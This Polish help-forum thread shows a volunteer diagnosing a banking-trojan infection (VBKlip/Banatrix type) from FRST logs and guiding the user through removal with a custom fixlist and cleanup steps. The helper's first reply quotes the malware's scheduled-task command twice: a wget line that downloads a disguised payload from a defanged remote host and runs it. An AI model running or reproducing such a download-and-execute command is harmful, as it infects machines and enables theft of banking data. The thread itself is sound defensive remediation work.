catyfish Opublikowano 6 Grudnia 2015 Zgłoś Udostępnij Opublikowano 6 Grudnia 2015 Mam problem z uruchomianiem komputera.Przy załączaniu następuje załączenie diodek startowej oraz stacji dysków uruchomiają się wentylatory i praktycznie to wszystko.Po kilkukrotnym zresetowaniu komputer uruchamia się poprawnie.Nie wiem czy przyczyną jest wirus bądź jakiś inny syf czy raczej jakieś problemy na kabelkach.Więc wykluczę najpierw problem z którym można sobie poradzic.Załączam logi. Addition.txt FRST.txt gmer.txt Shortcut.txt Odnośnik do komentarza
picasso Opublikowano 7 Grudnia 2015 Zgłoś Udostępnij Opublikowano 7 Grudnia 2015 W systemie jest infekcja w rodzaju VBKlip/Banatrix: Task: {7B119518-1A81-407A-9AA5-2026656037FF} - System32\Tasks\SYSTEM => cmd.exe /R cd "C:\ProgramData" & ping 1.1.1.1 -n 300 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp hxxp://grigle.in/index.php?data=FLBXfL38mG;Minecraft_1.8.1_Setup.exe;1434626853 & start cmd /R dat.bmp Ale to nie wygląda na przyczynę problemów, bo opis (o ile nie ma przekłamań) wskazuje, że problem z ruzruchem występuje znacznie wcześniej w fazie sprzętowo-sterownikowej niż zaczyna działać podany wpis. W Dzienniku zdarzeń powtarzają się błędy związane z oprogramowaniem grafiki nVidia: Dziennik System: ============= Error: (12/06/2015 04:11:52 PM) (Source: Service Control Manager) (EventID: 7016) (User: ) Description: Usługa NVIDIA Display Driver Service zaraportowała nieprawidłowy stan bieżący 32. Nie wykluczam też ingerencji Kaspersky Internet Security (bardzo rozbudowany układ sterowników). Na razie usuń infekcję: 1. Deinstalacje: - Przez Panel sterowania odinstaluj zbędnik Browser Configuration Utility. - Uruchom narzędzie Microsoftu: KLIK. Zaakceptuj > Wykryj problemy i pozwól mi wybrać poprawki do zastosowania > Odinstalowywanie > zaznacz na liście odpadek Dropbox Update Helper > Dalej. 2. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: Task: {087A29B3-E8A4-4EBE-920B-86951319A89D} - System32\Tasks\{47CD3A0E-294D-44A6-A0FE-276285D6B5E9} => C:\Program Files\EA GAMES\The Sims 2\TSBin\Sims2.exe Task: {0F57977C-987B-4DED-B56B-BD5D35980545} - System32\Tasks\{05F506B7-F212-4107-827F-666EC3492888} => pcalua.exe -a "C:\Program Files\EA GAMES\The Sims 2\EAUninstall.exe" Task: {1706BF99-B122-424E-983A-42516E8E9F47} - System32\Tasks\{D7F62B37-8A1F-49FF-8C0C-516B3AE041FC} => E:\Gry\bin\settlershok.exe Task: {1E130E74-AB89-473E-A51B-0475A71B81D7} - System32\Tasks\DropboxUpdateTaskMachineCore => C:\Program Files\Dropbox\Update\DropboxUpdate.exe [2015-08-26] (Dropbox, Inc.) Task: {297ECF24-AE9F-4C4F-837F-D93D8247DC18} - System32\Tasks\{068C6815-68CF-42D3-9AA5-31E646CE26A2} => pcalua.exe -a "C:\Program Files\EA GAMES\The Sims 2 University\TSBin\TS2UPD.exe" -d "C:\Program Files\EA GAMES\The Sims 2 University\TSBin" Task: {3D9B50B3-5C9E-4557-80F4-DDBA014DAE87} - System32\Tasks\{17E5DB57-5BC8-4807-9B53-137529101CD3} => C:\Program Files\EA GAMES\The Sims 2 Rezydencje i ogrody Akcesoria\TSBin\Sims2Launcher.exe Task: {4093740D-4DBF-439C-81FB-2D71B39AE580} - System32\Tasks\{3DDE85BA-5F25-426E-831E-E851F3445445} => C:\Program Files\EA GAMES\The Sims 2\TSBin\Sims2.exe Task: {4DEB46B7-C65D-463D-8620-A7CC7CB06F56} - System32\Tasks\{0AB73D29-99AA-4DB7-B717-431A14F27308} => pcalua.exe -a "E:\Gry\The Sims 2\12_Updates\1_Original.exe" -d "E:\Gry\The Sims 2\12_Updates" Task: {7B119518-1A81-407A-9AA5-2026656037FF} - System32\Tasks\SYSTEM => cmd.exe /R cd "C:\ProgramData" & ping 1.1.1.1 -n 300 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp hxxp://grigle.in/index.php?data=FLBXfL38mG;Minecraft_1.8.1_Setup.exe;1434626853 & start cmd /R dat.bmp Task: {800E7216-623D-4E65-B227-79C53729825B} - System32\Tasks\{9427E5F8-79EC-4457-A9B6-DA06BAFDAFAF} => C:\Program Files\EA GAMES\The Sims 2 Rezydencje i ogrody Akcesoria\TSBin\Sims2Launcher.exe Task: {860F0765-A6A5-40DA-AC58-89A92CE6A4B0} - System32\Tasks\{E9508B9A-3CA0-4538-8EDD-848FCCC4F067} => C:\Program Files\EA GAMES\The Sims 2\TSBin\Sims2.exe Task: {A0E0A8FA-2CC4-4A65-BCEF-D5BEC8690CFF} - System32\Tasks\{8943EBDB-1AF1-4212-B584-F3FB2927162A} => C:\Program Files\EA GAMES\The Sims 2\TSBin\Sims2.exe Task: {A7E240D8-3525-4969-8F03-ABE86043A4CE} - System32\Tasks\{9363E1D2-2840-4E70-8EFE-F18DAA81E113} => E:\Gry\The Sims 2\13_Crack\TSBin\Sims2EP9.exe Task: {B5173413-CC7E-4A06-BCD1-41FE726C69E6} - System32\Tasks\{F5232608-CABF-4999-B9C2-08B7832D2FBE} => C:\Program Files\EA GAMES\The Sims 2\TSBin\Sims2.exe Task: {BBB8B26A-5B68-4C66-A813-A4FA33C6F026} - System32\Tasks\{18CB654B-8D71-46C8-B865-DBD4E1CE8312} => C:\Program Files\Machinarium\machinarium.exe Task: {C73C8342-FB00-4E04-8311-25F81D8DAF01} - System32\Tasks\{4DBE77BC-8D8D-4B48-B955-588D29A336CF} => C:\Program Files\EA GAMES\The Sims 2 Rezydencje i ogrody Akcesoria\TSBin\Sims2Launcher.exe Task: {ECE14206-E29C-49E7-BE12-56B983828C0E} - System32\Tasks\{8BE9D02F-1EBB-45A4-919F-A7838D8C2BA5} => pcalua.exe -a "C:\Program Files\The Vanishing of Ethan Carter\Binaries\Launcher.exe" -d "C:\Program Files\The Vanishing of Ethan Carter\Binaries" Task: {F1C5DABB-41F4-47CA-9680-B5555961C80B} - System32\Tasks\{AC6BFA93-3B46-4B80-B02E-4B66AC5E441E} => pcalua.exe -a G:\Setup.exe -d G:\ Task: {F222E6AE-CD1D-48E2-AD4B-B92C62D71CEF} - System32\Tasks\{E6F600D8-5B0B-45C3-819D-33D545B5377F} => C:\Program Files\EA GAMES\The Sims 2\TSBin\Sims2EP9.exe Task: {F693F2FC-8AC6-4971-8BE0-23173167364D} - System32\Tasks\DropboxUpdateTaskMachineUA => C:\Program Files\Dropbox\Update\DropboxUpdate.exe [2015-08-26] (Dropbox, Inc.) Task: C:\Windows\Tasks\DropboxUpdateTaskMachineCore.job => C:\Program Files\Dropbox\Update\DropboxUpdate.exe Task: C:\Windows\Tasks\DropboxUpdateTaskMachineUA.job => C:\Program Files\Dropbox\Update\DropboxUpdate.exe S2 dbupdate; C:\Program Files\Dropbox\Update\DropboxUpdate.exe [136048 2015-08-26] (Dropbox, Inc.) S3 dbupdatem; C:\Program Files\Dropbox\Update\DropboxUpdate.exe [136048 2015-08-26] (Dropbox, Inc.) R3 cpuz134; \??\C:\Users\Lisqui\AppData\Local\Temp\cpuz134\cpuz134_x32.sys [X] SearchScopes: HKU\S-1-5-21-3357052344-2897467679-35886000-1000 -> {B9C3FD9C-B7E6-4fc2-9BCE-A1291F5C54C5} URL = hxxp://uk.search.yahoo.com/search?p={searchTerms}&fr=chr-devicevm&type=EGMB SearchScopes: HKU\S-1-5-21-3357052344-2897467679-35886000-1000 -> {DD18385B-81E9-4569-B0D8-661ECA1902D2} URL = hxxp://www.google.com/custom?client=pub-3794288947762788&forid=1&channel=5369970905&ie=UTF-8&oe=UTF-8&safe=active&cof=GALT%3A%23008000%3BGL%3A1%3BDIV%3A%23336699%3BVLC%3A663399%3BAH%3Acenter%3BBGC%3AFFFFFF%3BLBGC%3A336699%3BALC%3A0000FF%3BLC%3A0000FF%3BT%3A000000%3BGFNT%3A0000FF%3BGIMP%3A0000FF%3BFORID%3A1&hl=pl&q={searchTerms} FF user.js: detected! => C:\Users\Lisqui\AppData\Roaming\Mozilla\Firefox\Profiles\bwd06fxs.default-1445621495842\user.js [2015-10-23] CMD: type "C:\Program Files\Mozilla Firefox\defaults\pref\itms.js" C:\Program Files\Mozilla Firefox\defaults\pref\itms.js C:\Program Files\DAEMON Tools Pro C:\Program Files\Dropbox C:\ProgramData\dat.bmp C:\ProgramData\wget.exe C:\Users\Lisqui\AppData\Local\Dropbox C:\Users\Lisqui\AppData\Roaming\DAEMON Tools Pro C:\Users\Lisqui\Downloads\DriverDetective.exe C:\Users\Lisqui\Downloads\ReimageRepair.exe C:\Windows\Reimage.ini Reg: reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\mountpoints2 /f Reg: reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains" /f Reg: reg delete HKLM\SOFTWARE\Google\Chrome /f Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\BCU" /f Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\DAEMON Tools Pro Agent" /f Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\Dropbox" /f Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\Logitech Download Assistant" /f EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Zrób nowy log FRST z opcji Skanuj (Scan), ponownie z Addition, ale bez Shortcut. Dołącz też plik fixlog.txt. Wypowiedz się czy są jakieś widoczne zmiany. Odnośnik do komentarza
catyfish Opublikowano 7 Grudnia 2015 Autor Zgłoś Udostępnij Opublikowano 7 Grudnia 2015 Witam Strasznie się cieszę, że to właśnie Ty odpowiedziałaś na ten post. Miałam przyjemność naprawiac system pod Twoją pieczaą jakieś 8 lat temu jeszcze na Forum P2P:) Zrobiłam grzecznie to co zaleciłas ale nie znalazł mi fixit dropbox . Pozostałe ok, zamieszczam logi. Zmiany na razie niezauważalne, komputer jak na złość uruchamia się bez problemu. Addition.txt Fixlog.txt FRST.txt Odnośnik do komentarza
picasso Opublikowano 7 Grudnia 2015 Zgłoś Udostępnij Opublikowano 7 Grudnia 2015 Infekcja i inne śmieci pomyślnie usunięte. A ten aktualizator Dropbox zniknął, więc było tu robione coś innego w międzyczasie. Drobna poprawka. Otwórz Notatnik i wklej w nim: SearchScopes: HKU\S-1-5-21-3357052344-2897467679-35886000-1000 -> DefaultScope {20FE0224-0B8D-4dda-831B-1D68AE34EDA5} URL = S3 ServiceLayer; "C:\Program Files\PC Connectivity Solution\ServiceLayer.exe" [X] DeleteQuarantine: Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Tym razem nie będzie restartu. Przedstaw wynikowy fixlog.txt. Nowe skany FRST nie są mi już potrzebne. Odnośnik do komentarza
catyfish Opublikowano 7 Grudnia 2015 Autor Zgłoś Udostępnij Opublikowano 7 Grudnia 2015 Umieszczam log Fixlog.txt Odnośnik do komentarza
picasso Opublikowano 7 Grudnia 2015 Zgłoś Udostępnij Opublikowano 7 Grudnia 2015 W zakresie czyszczenia systemu skończyliśmy. Kroki końcowe: 1. Zastosuj DelFix i wyczyść foldery Przywracania systemu: KLIK. 2. Na wszelki wypadek zmień hasła logowania w ważnych serwisach (bank, poczta, serwisy społecznościowe,...). Odnośnik do komentarza
catyfish Opublikowano 7 Grudnia 2015 Autor Zgłoś Udostępnij Opublikowano 7 Grudnia 2015 Dziękuję. Odnośnik do komentarza
Rekomendowane odpowiedzi